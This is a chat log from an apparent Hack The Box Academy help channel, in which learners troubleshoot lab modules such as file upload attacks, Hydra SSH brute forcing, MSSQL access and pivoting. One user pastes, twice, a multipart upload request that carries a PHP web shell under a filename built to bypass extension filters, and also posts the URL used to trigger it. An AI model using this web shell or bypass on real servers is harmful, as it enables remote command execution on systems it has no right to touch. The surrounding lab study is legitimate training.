cloud urchin
cloud urchin
#

i don't know what module you're on so it's hard to help you

#

if you uploaded the shell maybe try looking at the source code

uneven cairn
#

File Upload Attacks

#

whitelist filters

#

I have already managed to identify how to bypass file type restrictions in the backend. I added a webshell to those payloads, but I don't know how to access it. I tried encoding it to URL but I still can't do it.

cloud urchin
#

idk what your shell code contains

#

can you reach your uploaded file?

uneven cairn
uneven cairn
nimble coyote
#

Hola! Estoy atascado en el modulo de enumeración web. Cuando quiero ejecutar algunos de los comandos me salen solamente errores, no se si yo estoy haciendo algo mal o que? Si alguien puede darme una mano se los agradecería.

uneven cairn
#

only english taco

nimble coyote
#

Ok

elfin dust
#

and when i go to root, it said i dont have permission

hushed sail
cloud urchin
uneven cairn
#

I CANT REACH IT

cloud urchin
#

did you review the source code on the page you upload the file to?

safe star
#

you really need to know how the find command works for this question

#

look for HTB tho

hushed sail
#

in order to reach your uploaded web shell, you have to know the file path to use in the url to trigger it

pastel wolf
#

Hi everyone, I doing the Linux fundamentals module - Navigation section, for the What is the index number of the "sudoers" file in the "/etc" directory?
I keep receiving an error to my answer. I've used the right command to see the index number but it's not taking my answer.

safe star
#

u 99% wont find it manually

hushed sail
#

and to view the source code of the website you’re uploading to, you just use Ctrl+U

safe star
#

u need to make a find command that looks for the string HTB in each file

uneven cairn
cloud urchin
#

so what you're expecting us to just tell you the answer?

hushed sail
#

¯_(ツ)_/¯

#

okay

uneven cairn
#

@fathom pendant

hard matrix
#

pretty bad way of soliciting help from strangers imo

cloud urchin
#

tom, we essentially gave you the answer without giving you the silver spoon that goes with it and you're not accepting it

#

maybe take the advice and review something you may have overlooked

uneven cairn
hard matrix
#

take a breather lil bro

uneven cairn
#

I don't know if you're looking for attention but Marcielee is not a stranger, has always helped in modules

hushed sail
#

yo let’s not let modules devolve into an argument

safe star
hushed sail
#

marcie very likely also will not straight up give you the answer.

go back over the module if you have to. we told you what you needed to do.

uneven cairn
safe star
hushed sail
#

good work. but delete that cause it’s still a spoiler

pastel wolf
#

For a index number of the specific file in a drectrory, there's two commands to use ls or stat correct? Am I missing a command?

safe star
#

pretty sure that was the only way to find it tbh

uneven cairn
#

With all due respect, if you don't know about a topic, just say so, don't waste my time.

hushed sail
#

@elfin dust delete the whole thing you wrote. it’s still a spoiler cause it gives away where the flag is lol

uneven cairn
hushed sail
#

stop

elfin dust
safe star
safe star
elfin dust
safe star
#

it was there just for us

elfin dust
#

ok tks for all the tips guys (Y)

uneven cairn
# safe star what exactly are u looking for? from what i seen they gave good directions

yes in fact it is a good direction but I don't know what I've been asking why I can't access the routes where it is already written and in a php executable format a web shell, it's not as simple as remembering the name because the evasion includes characters that confuse the behavior of the page, but even url encoding the characters to avoid their ambiguity I still can't get the file on the web page, what makes me angry is that they tell me what I already did and then treat me as if I were looking for the answer, if I were looking for it I would have asked I am asking something specific, if they are going to improvise and waste time it is better that they don't do it and do things right

pastel wolf
#

Hi everyone, For the Linux fundamentals module - Navigation section, for the What is the index number of the "sudoers" file in the "/etc" directory?
Is this question asking for an index number in a different context, such as a file's position in a directory listing or something else?

safe star
#

then its the wrong extension

uneven cairn
#

let me show you

safe star
#

and find another set

uneven cairn
#
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:port/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395223586137621495382826115921

Content-Length: 268
Origin: http://ip:port
DNT: 1
Connection: close
Sec-GPC: 1

-----------------------------395223586137621495382826115921
Content-Disposition: form-data; name="uploadFile"; filename="shell.php.\\.jpg"
Content-Type: image/jpeg

<?php system($_REQUEST['cmd']); ?>
-----------------------------395223586137621495382826115921--
```  and this is the response:  ```HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 01:03:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

File successfully uploaded```
#

http://ip:port/profile_images/shell.php.%5C%5C.jpg?cmd=ls I GET NO FOUND

safe star
#

you can assume that slashes just wont work in this case

proper oar
#

AD path - MSSQL module first part; not sure why this is not working - tried several variants including updated impacket. can ping and nmap the machine, service (mssql) is up on 1433, can rdp in and go about it that method but curious what the issue is here

uneven cairn
viral snow
#

hey yall. i'm in AD Enumeratoin & Attacks Skills Assessment Part 2 Questoin 7. I'm trying to use mssqlclient.py but i keep getting a TimeoutError message. i used python3 and -windows-auth. are there any alternatives yall recommend?

safe star
hushed sail
#

if you haven’t already and it’s just cut off in the screenshot

proper oar
#

i did try it, but that too was unsuccessful. Strange because I've used this many times and seem to regularly have an issue @hushed sail

uneven cairn
# safe star its def there but the file wont load correctly with slashes

You finally got to my initial question and you didn't get tangled up like them, but then how do I do that? There is also: shell.php%2F.jpg (shell.php/.jpg) which also uploads the file correctly, but the same problem occurs, I can't access the file, do you have any clue? I know I'm close.

safe star
next bronze
pastel wolf
safe star
#

they gave you a script in the section, just edit what you do or dont need @uneven cairn

uneven cairn
#

sorry

#

you let me got something, thank you im done here

proper oar
safe star
#

on the sudoers file?

pastel wolf
#

Yes I tried ls -I /etc/sudoers and stat /etc/sudoers

safe star
pastel wolf
safe star
pastel wolf
#

Yeah it's still the same outcome

safe star
viral snow
#

Any help with my question above?

safe star
#

impacket-mssqlclient

next bronze
viral snow
next bronze
safe star
#

ik but i thought those were older versions instead of aliases

next bronze
#

nah the impacket-x stuff is installed with apt which is not really the right way to install and can cause problems, and those are usually the older version since the apt repo is not updated regularly

safe star
#

yeah, that would make more sense

viral snow
safe star
#

or is this all on the attack machine

viral snow
#

Well that's the thing. Apparently im supposed to use mssqlclient on the jump box, and I'm also supposed to start http.server on the same jump box...which is confusing as heck. At least those are what the notes from a buddy of mine that completed the entire path 🤷🏽‍♂️

safe star
viral snow
proper oar
viral snow
safe star
viral snow
next bronze
#

in the mssqlcient command earlier in the section another username was used

uneven cairn
proper oar
#

but that's module 1 in the section

next bronze
proper oar
#

x_x

uneven cairn
#
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://ip:port/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------395223586137621495382826115921

Content-Length: 268
Origin: http://ip:port
DNT: 1
Connection: close
Sec-GPC: 1

-----------------------------395223586137621495382826115921
Content-Disposition: form-data; name="uploadFile"; filename="shell.php.\\.jpg"
Content-Type: image/jpeg

<?php system($_REQUEST['cmd']); ?>
-----------------------------395223586137621495382826115921--```

  and this is the response:  

```HTTP/1.1 200 OK
Date: Thu, 26 Sep 2024 01:03:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

File successfully uploaded

http://ip:port/profile_images/shell.php.%5C%5C.jpg?cmd=ls  I GET NO FOUND```
safe star
#

all im gonna say is that it requires no special characters

uneven cairn
#

I was trying to add more file extensions to the script to see if other combinations would work.

safe star
#

yes and remove the special characters loop

#

it should be a pretty short list

next bronze
#

if you get not found that means the file isn't being uploaded correctly or it's not being saved to the server with the name you expect

next bronze
uneven cairn
safe star
pine crag
#

i got pump just from doing labs
sitting on chair for hours not that bad

hard matrix
#

no nitro but :gigachad:

pine crag
#

fr

hard matrix
#

anyone done the bruteforcing modules recently?
hydra is giving me

[ERROR] target ssh://83.136.254.37:43889/ does not support password authentication (method reply 4).

searches online + in the discord for other people running into this problem suggested they were still using port 22 for ssh.
built hydra from source and i'm using the correct port, a little confused

cmd im using is /tools/hydra/hydra -L {name}-usern.txt -P {name-pws}.txt ssh://83.136.254.37:43889

cloud urchin
#

which module nad which section exactly, also there's an error right there that say password authentication isn't supported.

hard matrix
#

it is though

#

Login Brute Forcing - Skills Assessment - Service Login

cloud urchin
#

why are you trying to ssh in as root

#

its a login brute force assessment

hard matrix
#

because you suggested that password authentication isn't supported, that was a proof that it is

cloud urchin
#

ok double check your hydra command

hard matrix
#

¯_(ツ)_/¯

cloud urchin
#

you don't need to show all that

#

i'd suggest reviewing the service authentication brute forcing section

hard matrix
#

?

#

to get to this point in the module i've already done a hydra brute force against ssh

sick whale
#

bruteforcing SSH is usually a pain in the butt anyway no?
Any other service (easier to bruteforce) open that could potentially do pwd reuse?

(I've not done the module yet, so I'm just spewing an idea :p )

hard matrix
#

i've bruteforced ssh with hydra doing boxes on htb all the time, this is just bizarre and i feel like its due to the nonstandard ssh port and for some reason hydra won't take the custom port.

cloud urchin
pine crag
#

try medusa

hard matrix
#

not trying to be combative

#

i literally do not see what i am doing differently at all. -u -f are unrelated to this error

cloud urchin
#

maybe try restarting the target then

pine crag
#

try patator

cloud urchin
#

also what is /tools/hydra/hydra, instead of just 'hydra'

next bronze
hard matrix
#

please read what i said in the first message asking for help - i built it from source to make sure there wasn't a problem with the kali version of hydra

hard matrix
next bronze
#

there's another way to specify the port

hard matrix
#

i specified -s but my messages are being deleted and got the same error

sick whale
#

Have you tried to add -vV to check connection messages?

#

Might give you details on what it is doing behind the scenes

hard matrix
#

really strange.

[DATA] attacking ssh://83.136.254.37:43889/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://harry@83.136.254.37:43889
[ERROR] target ssh://83.136.254.37:43889/ does not support password authentication (method reply 4).

port seems to be correct

#

maybe its just for that specific user?

sick whale
#

try ssh-ing manually using that user?

#

just to cross check

hard matrix
eager ledge
#

Why are you using username when specifying the hostname for hydra?

hard matrix
#

ahhhhh

eager ledge
#

You are already giving the username list using -L flag

hard matrix
next bronze
#

wireshark time

sick whale
#

I would reset the box first before looking at packets hahaha

hard matrix
#

lmao

storm elk
#

When I’m sure something should work and it doesn’t, I try pwnbox 😅

sick whale
hard matrix
#

vehement hatred of pwnbox

storm elk
#

If it doesn’t work there, then I’m sure that I’m wrong kek

sick whale
#

Would isolate that it's your hydara build at least

pine crag
#

maybe needs the id_rsa

#

to authenticate

sick whale
#

I also hate pwnbox, but it does have its uses

storm elk
hard matrix
#

very annoying thanks everyone

sick whale
#

Check pwnbox and report please, now we're involved 😄

pine crag
#

im still beginning in this field, wish i could help

sick whale
#

(Also I'm finishing the AD module and the bruteforce login one is coming soon haha)

storm elk
pine crag
#

im about to finish Attacking Common Services in cpts path

pine crag
#

thanks

eager ledge
sick whale
#

@storm elk quick unrelated question: how are the badges (not the certs ones, or mods, obviously) awarded (Community contributor etc....) ?

hard matrix
#

Worked on pwnbox - absolute utter blasphemy

sick whale
#

hahahahahaha

hard matrix
#

now I have to worry about having to fix whatever the hell is wrong with my hydra installation

#

which really shouldn't be the case, building it from source

sick whale
#

what distro are you running?

hard matrix
#

Linux kali 6.8.11-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.8.11-1kali2 (2024-05-30) x86_64 GNU/Linux

#

reinstalled hydra, built it from source, googled a bit

#

hopefully this helps someone who searches module chat history if they run into the same problem

storm elk
hard matrix
#

for what its worth, parrotbox is using Hydra v9.4 and i have Hydra v9.6dev (c) installed. it's probably due to something with the hydra versions

sick whale
#

Thanks

storm elk
#

Which other worlds would you like to know about?

next bronze
#

what about the seadris badge and the banned badge

storm elk
sick whale
#

I will just get the CPTS badge, that'll be a good start

eager ledge
storm elk
next bronze
#

or the alt @river lichen

eager ledge
#

I don't see any badges for BreadTora

stark lark
hard matrix
#

yep, make sure to read the hint

stark lark
hard matrix
#

make sure all the lines conform to the password policy

stark lark
#

I already trimmed the PW list, from what I saw It was just the same rules as in the module

hard matrix
#

yeah, it'll take a little while

stark lark
#

Do you think -u will do any good? running with it currently.

#

Also thought of using the same username format as in the module e.g h.potter and let that run for itself

azure bough
#

Hi! Where can I go.
I mean for DANTE Labs suggestions.

#

I'm not able to understand what to do, I mean after pivoting etc
.. 😭

wheat meadow
#

Hello

storm elk
safe star
next bronze
#

172.16.4.0/23 has a range of 172.16.4.0 - 172.16.5.255

limber river
#

it's a subnet not an ip (lot of ip)

#

starting from 172.16.4.0 end with 172.16.5.255

next bronze
#

you said it yourself that the pivot host has an ip of 172.16.5.129/255.255.254.0, so autoroute is opening that subnet

limber river
#

it's 255.255.254.0 so /23

#

and this will be 172.16.4.0

limber river
#

they was asking for the subnet

#

no

#

why ?

wary plover
#

then you should review the networking section

ember furnace
#

Hey, im trying to verificate mi mail and i have this error, we think tou are a bot try submiting the form how i can fix it? I cant acces my account at this point

safe star
#

I just use the regular gpt4

storm elk
forest gust
#

Can you tell me what I'm doing wrong?
Module Attacking Enterprise Networks

limber river
#

?

forest gust
forest gust
limber river
ember furnace
tribal plinth
storm elk
limber river
#

you already fixe it nice

forest gust
#

I just found the same problem on the forum before that, but there was no solution there either.

ember furnace
tribal plinth
tribal plinth
#

Try with a different browser or updating the browser if it's outdated

autumn pilot
#

Double-check your /etc/hosts entries and additionally, you can try sending a GET/POST requests to see if they time out too

forest gust
forest gust
#

Initially, everything goes well. and at the moment with TRACK it breaks down

#

It's just that the first answer I get is the same as in the module.

tribal plinth
tribal plinth
forest gust
tribal plinth
#

Awesome!

safe robin
#

nothing worked

#

Firewall and IDS/IPS Evasion - Medium Lab

#

@tribal plinth

#

@shell ore

#

ok it worked with -PE -sC flag

analog dock
#

Why are you randomly pinging people

cosmic obsidian
#

How can i Solve this error. I am getting this problem in "VACCINE" Machine.

analog dock
cosmic obsidian
#

anybody please help out?

analog dock
#

Only modules

old oasis
cosmic obsidian
shut vapor
#

this AD module goes on foooorever...

#

i better hit 50% hacker level by the time it's over with

tropic hearth
#

Question: Is Linux Fundamentals module out of date? Seems like a file that is assumed to exist once upon a time doesn't anymore...

#

I found myself a medium walkthrough that had the answers but even replicating their commands didn't yield what they got..and their answers work

quiet trout
marsh echo
quiet trout
#

oh sorry file, not cmd, yeah theres a few small discrepancies

tropic hearth
#

not tree...the literal .conf file or .bak file isn't there....and my .log count should be 32 but when I actually run command chain it is 82...lol

#

I figure there must be some reason behind it

next bronze
marsh echo
#

i tried write the file at c:/ but error

wanton jasper
#

This Command Injections Skills Assessment is killing me. I found a working payload last night to test whoami. Got up to finish finding the flag and building off of that. Now my payload does not work.

marsh echo
#

however in the IT path the user htb-student has access :/ ...

worldly pike
#

hello i am stuck at this question. It didn't ask to start machine or something.
i have started machine and used the Ip in image but got result "Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn"
i tried the command (sudo nmap 10.129.2.18 -Pn -O )it show nothing about OS. sorry am new.

wanton jasper
midnight galleon
worldly pike
midnight galleon
worldly pike
midnight galleon
#

guided mode is what isn't available

worldly pike
wanton jasper
foggy monolith
#

John the Ripper is returning "No password hashes loaded (see FAQ)" on attempt to load the mssqlsvc hash in the AD Enum > Cross-Forest Trust Abuse from Windows section — any idea why this would be the case?

#

First hash I've ever had this problem with; everything else has worked properly with JtR.

#

Hash file was generated using the /outfile: option in Rubeus for context

hushed sail
foggy monolith
cloud urchin
#

why are you using john instead of hashcat

hushed sail
foggy monolith
#

Hashcat seems to work better on my M1 MacBook Pro; trying that next.

hushed sail
#

report back if works

foggy monolith
#

Worked like a charm. Yeah, for whatever reason this was the first hash that I absolutely needed Hashcat for; everything else worked fine with John up until this point.

sick whale
#

Don't spoil username 🙂
Have you clicked around in the file explorer ?

#

(Can't remember if username is given by the assessment or not, apologies if it is and it's not a spoil)

uncut ocean
#

lol

#

thanks man

sick whale
#

Got it haha ?

uncut ocean
#

ya imma stupid

sick whale
#

Most stupid flag of the modules hahaha

#

I was expecting another long step etc... and then oO

next bronze
#

mate you're really spoiling the heck out of AEN, most people would like to do it blind, avoid spoilers please

#

also the module itself is a walkthrough, if you're stuck, you can refer to that

sick whale
#

Question (not related to modules, but still relevant here I think):

Anyone has a terminal trick to delete/replace arguments in a command?
I know I can use variables like export IP = so that in my history, commands come up with $IP, but what about a way to just select and "paste over" ? Any ideas?